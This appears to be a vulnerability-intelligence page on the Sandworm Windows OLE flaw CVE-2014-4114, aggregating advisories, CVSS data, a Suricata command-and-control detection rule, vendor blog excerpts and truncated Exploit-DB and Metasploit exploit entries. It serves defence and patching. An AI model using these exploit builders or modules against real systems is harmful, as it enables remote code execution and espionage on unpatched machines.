CVE-2014-4114
published 2014-10-15CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold…
PriorityP190high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-03-24
Exploited in the wild
EPSS
81.63%
99.6th percentile
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort↗
32186
- →The exploit embeds two OLE objects in a malicious PowerPoint file: a .inf file and an executable. The .inf file modifies the host and launches the malicious executable; a registry key is added for persistence after reboot. ↗
- →Malware signatures Trojan.Mdropper and Backdoor.Lancafdo.A are associated with the Sandworm/CVE-2014-4114 campaign and can be used as AV/SIEM detection criteria. ↗
- ·The Recorded Future hash (MD5) and IP were extracted from social media (tweets) at the time of initial disclosure and may represent early-stage, unverified IOCs; the IP was reportedly removed from Twitter shortly after posting. ↗
- ·The Talos IP list covers infrastructure observed at the time of initial exploitation (October 2014); these IPs may have rotated or been reassigned since then. ↗
- ·Windows XP is explicitly not affected by CVE-2014-4114; detection and patching efforts should focus on Vista SP2 and later supported versions. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2014-4114 [HIGH] CWE-20 Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
Vulnerability: Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
Affected: Microsoft Windows
A vulnerability exists in Windows Object Linking & Embedding (OLE) that could allow remote code execution if a user opens a file that contains a specially crafted OLE object.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-4114
Remediation Due Date: 2022-03-24
GHSA
GHSA-3hff-6c4j-j2w5: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8
ghsa_unreviewed·2022-05-14
CVE-2014-4114 [HIGH] CWE-20 GHSA-3hff-6c4j-j2w5: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
VulnCheck
Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
vulncheck·2014·CVSS 7.8
CVE-2014-4114 [HIGH] CWE-20 Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
Microsoft Windows Object Linking & Embedding (OLE) Remote Code Execution Vulnerability
A vulnerability exists in Windows Object Linking & Embedding (OLE) that could allow remote code execution if a user opens a file that contains a specially crafted OLE object.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/; https://www.trendmicro.com/en_us/research/14/j/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm.html; https://www.cve.org/CVERecord?id=CVE-2014-4114; https://blog.trendmicro.com/trendlabs-security-intelligence/tim
VulnCheck
Microsoft Graphics Component Memory Corruption Vulnerability
vulncheck·2013·CVSS 7.8
CVE-2013-3906 [HIGH] CWE-94 Microsoft Graphics Component Memory Corruption Vulnerability
Microsoft Graphics Component Memory Corruption Vulnerability
Microsoft Graphics Component contains a memory corruption vulnerability which can allow for remote code execution.
Affected: Microsoft Graphics Component
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2013-3906; https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-096?redirectedfrom=MSDN; https://cyberwarzone.com/wp-content/uploads/2014/06/CrowdStrike_Global_Threat_Report_2013.pdf; https://web.archive.org/web/20160503234007/https://www.isightpartners.com/2014/10/cve-2014-4114/; https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf; https://www.group-ib.com/brochures/gib-buhtrap-rep
Suricata
ET MALWARE Wonton-JH Checkin
suricata·2014-10-24
CVE-2014-4114 ET MALWARE Wonton-JH Checkin
ET MALWARE Wonton-JH Checkin
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Wonton-JH Checkin"; flow:established,to_server; http.method; content:"POST"; http.uri; content:".asp?M00="; fast_pattern; pcre:"/^\d+$/R"; http.header; strip_pseudo_headers; bsize:35; content:"Mozilla/4.0 (Compatible|3b 20|MSIE 6.0|3b|)"; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,blog.cylance.com/emerging-threat-alert-cve-2014-4114; reference:md5,37ca2ecb5e1fc89f73c6adc188ff685d; classtype:command-and-control; sid:2019502; rev:5; metadata:created_at 2014_10_24, signature_severity Major, updated_at 2024_04_29;)
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
exploitdb·2014-11-14
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
to be vulnerable. However, based on our testing, the most reliable setup is on Windows
pla
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
exploitdb·2014-11-14
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability
publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista
SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.
However, based on our testing, the most reliable setup is on Windows plat
Exploit-DB
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
exploitdb·2014-11-12·CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
---
#
# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar
#
#CVE-2014-6352 OLE Remote Code Execution
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Tested on win7 - office 2007 and 2010. The exploit will not give UAC warning the user account is administrator. Else there will be a UAC warning.
#No .inf file is required in this exploit
#The size of executable payload should be less than 400kb
#python 2.7 required
#The folder "temp" should be in same dir as this python file.
# usage - python.exe
Exploit-DB
Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)
exploitdb·2014-10-25·CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)
Microsoft Windows - OLE Remote Code Execution 'Sandworm' (MS14-060)
---
# !/usr/bin/python
# Windows OLE RCE Exploit MS14-060 (CVE-2014-4114) Sandworm
# Author: Mike Czumak (T_v3rn1x) - @SecuritySift
# Written: 10/21/2014
# Tested Platform(s): Windows 7 SP1 (w/ exploit script run on Kali Linux)
# You are free to reuse this code in part or in whole with the exception of commercial applications
# For a demo of this PoC, see http://www.securitysift.com/windows-ole-rce-exploit-ms14-060/
import sys, os
import zipfile
import argparse
import subprocess
from shutil import copyfile
from pptx import Presentation
# Args/Usage
def get_args():
parser = argparse.ArgumentParser( prog="ms14_060.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''This scri
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
exploitdb·2014-10-20
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
as using
Exploit-DB
Microsoft Windows - OLE Package Manager SandWorm
exploitdb·2014-10-20·CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Windows - OLE Package Manager SandWorm
Microsoft Windows - OLE Package Manager SandWorm
---
#!/usr/bin/env python
import os
import zipfile
import sys
'''
Full Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35019.tar.gz
Very quick and ugly [SandWorm CVE-2014-4114] exploit builder
Exploit Title: CVE-2014-4114 SandWorm builder
Built to run on: Linux/MacOSX
Date: 17/10/2014
Exploit Author: Vlad Ovtchinikov (@v1ad_o)
Vendor Homepage: microsoft.com
Tested on: Win7Sp1 64 bit - Microsoft Offcie 2013 Plus
Demo: http://youtu.be/ljjEkhflpvM
CVE : CVE-2014-4114
NOTE:
expl.inf (md5 8313034e9ab391df83f6a4f242ec5f8d) + expl.zip (md5 4a39121a60cc79d211fc7f7cfe00b707)
should be located in the same dir as the builder.
01:39 cve-2014-4114.py
19:35 expl.inf
15:37 expl.zip
e.g. python cve-2014-4114.py
Metasploit
MS14-060 Microsoft Windows OLE Package Manager Code Execution
metasploit
MS14-060 Microsoft Windows OLE Package Manager Code Execution
MS14-060 Microsoft Windows OLE Package Manager Code Execution
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a failure in the CPackage::CreateTempFileName function. This module will generate three files: an INF, a GIF, and a PPSX file. You are required to set up a SMB or Samba 3 server and host the INF and G
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Tenable
Sandworm APT Deploys New SwiftSlicer Wiper Using Active Directory Group Policy
blogs_tenable·2023-01-27
Sandworm APT Deploys New SwiftSlicer Wiper Using Active Directory Group Policy
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Untangling the Patchwork Cyberespionage Group
blogs_trendmicro·2017-12-11
Untangling the Patchwork Cyberespionage Group
Cyber Crime
# Untangling the Patchwork Cyberespionage Group
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets.
By: Daniel Lunghi, Jaromir Horejsi, Cedric Pernet
2017/12/11
Read time: ( words)
Save to Folio
Updated as of October 9, 2018, 7:24PM PDT to remove Socksbot and update the appendix and technical brief; hat tip to Michael Yip of Accenture Security for an earlier research on Socksbot.
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets. Patchwork’s moniker is from its notoriety for rehashing off-the-rack tools and malwa
Unit42
New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
blogs_unit42·2016-04-22·CVSS 7.8
[HIGH] New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
Malware writers have always sought to develop feature-rich, easy to use tools that are also somewhat hard to detect via both host- and network-based detection systems. For many years, one of the go-to families of malware used by both less-skilled and advanced actors has been the Poison Ivy (aka PIVY) RAT. Poison Ivy has a convenient graphical user interface (GUI) for managing compromised hosts and provides easy access to a rich suite of post-compromise tools. It is no surprise it’s now being used against pro-democracy organizations and supporters in Hong Kong that have long been a target of advanced attack campaigns.
Despite its simplicity and prevalence, detection rates for both AV and IDS systems has always been surprisingly low for Poison Ivy. Possibly for these reasons, since the mid-
Unit42
New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
blogs_unit42·2016-04-22
New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
Threat Research Center
Threat Research
Malware
## New Poison Ivy RAT Variant Targets Hong Kong Pro-Democracy Activists
Micah Yates
Mike Scott
Brandon Levene
Jen Miller-Osborn
Published: April 21, 2016
Malware
Threat Research
DLL
PIVY
Poison Ivy
SPIVY
Malware writers have always sought to develop feature-rich, easy to use tools that are also somewhat hard to detect via both host- and network-based detection systems. For many years, one of the go-to families of malware used by both less-skilled and advanced actors has been the Poison Ivy (aka PIVY) RAT. Poison Ivy has a convenient graphical user interface (GUI) for managing compromised hosts and provides easy access to a rich suite of post-compromise tools. It is no surprise it’s now being used against pro-democracy organiza
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6
[LOW] US-CERT: Top 30 Vulnerabilities | Qualys
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
- Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
- Internet Explorer: MS14-021 for CVE-2014-1776, Qualys ID: 100191
- MS14-012 for CVE-201
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6
[LOW] US-CERT: Top 30 Vulnerabilities | Qualys
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
MS14-012 for CVE-2014-0322
MS13-038 for CVE-2013-1347
MS13-008 for CVE-2012-4792
MS10-01
Talos
Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
blogs_talos·2014-11-11·CVSS 7.8
[HIGH] Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
## Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
This month Microsoft is releasing 14 security bulletins. Originally they had planned to release 16, but due to issues that emerged in late testing, two bulletins that were announced in the Advance Security Notification, MS14-068 and MS14-075, have been postponed. Of the 14 bulletins, four are considered critical, eight are important, while two are moderate. They cover a total of 33 CVEs.
We’ll start off with the four critical bulletins, for a total of 21 CVEs that can result in remote code execution:
Our first bulletin of the month is MS14-064 and fixes two vulnerabilities ( CVE-2014-6332 , CVE-2014-6352 ) in Windows Object Linking and Embedding (OLE) that could allow remote code execution. Both issues are seei
Talos
Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
blogs_talos·2014-11-11·CVSS 7.8
[HIGH] Microsoft Update Tuesday November 2014: Fixes for 3 0-day
Vulnerabilities
This month Microsoft is releasing 14 security bulletins. Originally they had planned to release 16, but due to issues that emerged in late testing, two bulletins that were announced in the Advance Security Notification, MS14-068 and MS14-075, have been postponed. Of the 14 bulletins, four are considered critical, eight are important, while two are moderate. They cover a total of 33 CVEs.
We’ll start off with the four critical bulletins, for a total of 21 CVEs that can result in remote code execution:
Our first bulletin of the month is MS14-064 and fixes two vulnerabilities (CVE-2014-6332, CVE-2014-6352) in Windows Object Linking and Embedding (OLE) that could allow remote code execution. Both issues are seeing attack in the wild and can be considered 0-days. CVE-2014-6352 is a vulnerabil
Talos
Weaponized Powerpoint in the Wild
blogs_talos·2014-10-16·CVSS 7.8
CVE-2014-4114 [HIGH] Weaponized Powerpoint in the Wild
This post was written by Jaeson Schultz.
On October 14th information related to a new Windows vulnerability, CVE-2014-4114, was published. This new vulnerability affects all supported versions of Microsoft Windows. Windows XP, however, is not affected by this vulnerability. The problem lies in Windows’ OLE package manager. When triggered it allows for remote code execution.
In this case, attackers crafted a malicious Powerpoint document. Upon execution the Powerpoint document would extract two embedded OLE objects: a .inf file, and another executable. The .inf file is used to make changes to the host system, and launch the malicious executable. A key is added to the registry to keep the malware running after a system restart. While it has been alleged that this specific attack was initia
Talos
Weaponized Powerpoint in the Wild
blogs_talos·2014-10-16·CVSS 7.8
CVE-2014-4114 [HIGH] Weaponized Powerpoint in the Wild
## Weaponized Powerpoint in the Wild
This post was written by Jaeson Schultz . On October 14th information related to a new Windows vulnerability, CVE-2014-4114 , was published. This new vulnerability affects all supported versions of Microsoft Windows. Windows XP, however, is not affected by this vulnerability. The problem lies in Windows’ OLE package manager. When triggered it allows for remote code execution. In this case, attackers crafted a malicious Powerpoint document. Upon execution the Powerpoint document would extract two embedded OLE objects: a .inf file, and another executable. The .inf file is used to make changes to the host system, and launch the malicious executable. A key is added to the registry to keep the malware running after a system restart. While it has been allege
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities, Adobe issued updates for Flash and ColdFusion, and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
### Sandworm
The first to drop was the Sandworm Campaign, a report from iSight partners, which described attacks on European and American targets in the month of August using new versions of the BlackEnergy bot, but the group behind the attacks has been operating since at least 2009. The biggest news here was the group’s exploitation of a “new” vulnerability in Windows, CV
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
## Super Tuesday: A Patch Tuesday We Won’t Forget
Ryan Olson
Published: October 15, 2014
Threat Research
Vulnerabilities
BlackEnergy
ISight
Microsoft
Microsoft Security Bulletin
Patch Tuesday
PowerShell Empire
Sandworm
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities , Adobe issued updates for Flash and ColdFusion , and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
## Sandworm
The first to drop was the Sandworm Campaign , a report from iSight partners, which described attacks on European and American t
Talos
Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
blogs_talos·2014-10-14·CVSS 7.8
[HIGH] Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
## Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
This post was authored by Yves Younan
Microsoft Tuesday is here once again and this month they are releasing a total of eight bulletins. Three of which are rated as critical, while the remaining five are rated as important. There’s a total of 24 CVEs this month, 20 of which were privately disclosed to Microsoft and four which are either publicly known or under active attack, making them 0-day vulnerabilities. Of those four, two are being actively attacked, while two have been publicly disclosed but do not seem to be under attack for supported software. Of the 24 CVEs, 15 are categorized as allowing remote code execution, four as elevation of privilege and three as security feature bypasses.
The first bulletin is
Talos
Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
blogs_talos·2014-10-14·CVSS 4.3
[MEDIUM] Microsoft Update Tuesday October 2014: Fixes for 4 0-day Vulnerabilities
This post was authored by Yves Younan
Microsoft Tuesday is here once again and this month they are releasing a total of eight bulletins. Three of which are rated as critical, while the remaining five are rated as important. There’s a total of 24 CVEs this month, 20 of which were privately disclosed to Microsoft and four which are either publicly known or under active attack, making them 0-day vulnerabilities. Of those four, two are being actively attacked, while two have been publicly disclosed but do not seem to be under attack for supported software. Of the 24 CVEs, 15 are categorized as allowing remote code execution, four as elevation of privilege and three as security feature bypasses.
The first bulletin is MS14-056 and is the IE bulletin. There’s a total of 14 CVEs and it is rated
Krebs
Microsoft, Adobe Push Critical Security Fixes
blogs_krebs·2014-10-14·CVSS 7.8
[HIGH] Microsoft, Adobe Push Critical Security Fixes
Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.
Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is appa
Zscaler
Analysis Of SandWorm (CVE-2014-4114) 0-Day | Zscaler
blogs_zscaler·2014-10-14·CVSS 7.8
[HIGH] Analysis Of SandWorm (CVE-2014-4114) 0-Day | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Krebs
Microsoft, Adobe Push Critical Security Fixes – Krebs on Security
blogs_krebs·2014-10-01·CVSS 7.8
[HIGH] Microsoft, Adobe Push Critical Security Fixes – Krebs on Security
Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office , Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.
Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today ( CVE-2014-4114 ). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is a
Recorded Future
Discovering Sandworm Indicators with Maltego Transforms
blogs_recorded_future·CVSS 7.8
CVE-2014-4114 [HIGH] Discovering Sandworm Indicators with Maltego Transforms
# Discovering Sandworm IOCs With Recorded Future Maltego Transforms
Webinar: How to use Maltego for better insight into cyber threats. Watch now.
Yesterday, iSIGHT Partners published a blog post announcing the discovery of CVE-2014-4114, a zero-day vulnerability used in a Russian cyber-espionage campaign. The campaign was dubbed Sandworm and it’s getting a ton of attention via social media as seen in the Recorded Future timeline below.
I recently outlined how to use Recorded Future Maltego transforms to discover indicators of compromise (IOCs) from OSINT so I decided to analyze the Sandworm vulnerability with a similar approach.
### Step-by-Step Outline
First, I search for the single vulnerability entity (CVE-2014-4114) mentioned in the iSIGHT report.
Then I run our VULN2RF transform
Threat Intel
BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
threat_intel·CVSS 7.8
[HIGH] BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
# Threat Actor Profile: BRONZE BUTLER
ATT&CK ID: G0060
Also known as: BRONZE BUTLER, REDBALDKNIGHT, Tick
Suspected origin: China
## Overview
BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.(Citation: Symantec Tick Apr 2016)
### Initial Access
- T1566.001 Spearphishing A
Recorded Future
Discovering Sandworm Indicators with Maltego Transforms | Recorded Future
blogs_recorded_future·CVSS 7.8
CVE-2014-4114 [HIGH] Discovering Sandworm Indicators with Maltego Transforms | Recorded Future
## Discovering Sandworm IOCs With Recorded Future Maltego Transforms
Webinar: How to use Maltego for better insight into cyber threats. Watch now .
Yesterday, iSIGHT Partners published a blog post announcing the discovery of CVE-2014-4114 , a zero-day vulnerability used in a Russian cyber-espionage campaign. The campaign was dubbed Sandworm and it’s getting a ton of attention via social media as seen in the Recorded Future timeline below.
I recently outlined how to use Recorded Future Maltego transforms to discover indicators of compromise (IOCs) from OSINT so I decided to analyze the Sandworm vulnerability with a similar approach.
## Step-by-Step Outline
First, I search for the single vulnerability entity (CVE-2014-4114) mentioned in the iSIGHT report.
Then I run our VULN2RF transfo
Crowdstrike
Arrests Put New Focus on CARBON SPIDER Adversary Group
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Arrests Put New Focus on CARBON SPIDER Adversary Group
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Zscaler
Zscaler found Multiple Security Vulnerabilities | 10-14-2014
blogs_zscaler·CVSS 8.8
[HIGH] Zscaler found Multiple Security Vulnerabilities | 10-14-2014
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
